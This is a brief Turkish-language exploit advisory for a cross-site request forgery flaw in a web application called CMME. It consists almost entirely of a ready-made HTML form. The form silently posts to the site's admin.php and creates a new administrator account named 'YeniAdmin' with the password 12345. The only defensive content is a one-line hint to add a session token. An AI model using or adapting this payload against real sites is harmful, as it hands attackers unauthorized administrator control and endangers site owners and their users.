< ------------------- header data start ------------------- >

#############################################################

# Application Name : CMME

# vulnerable Type : XSRF

# Infection : Yeni Admin Eklenebilir !

# Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmelidir ..

# author : SiLent-Death(_iLLeqaL_) ~ Bug Researchers

#############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >




<form action=http://[site].com/[yol]/admin.php?action=users&subaction=add&env=data method=post>
<input class=text name=user type=hidden value=YeniAdmin />
<input type=hidden name=role value=admin>
<input class=text name=pass type=hidden value=12345 />
<input type=submit class=submit name=submit value=Tamam />
</form>


</form>

< -- bug code end of -- >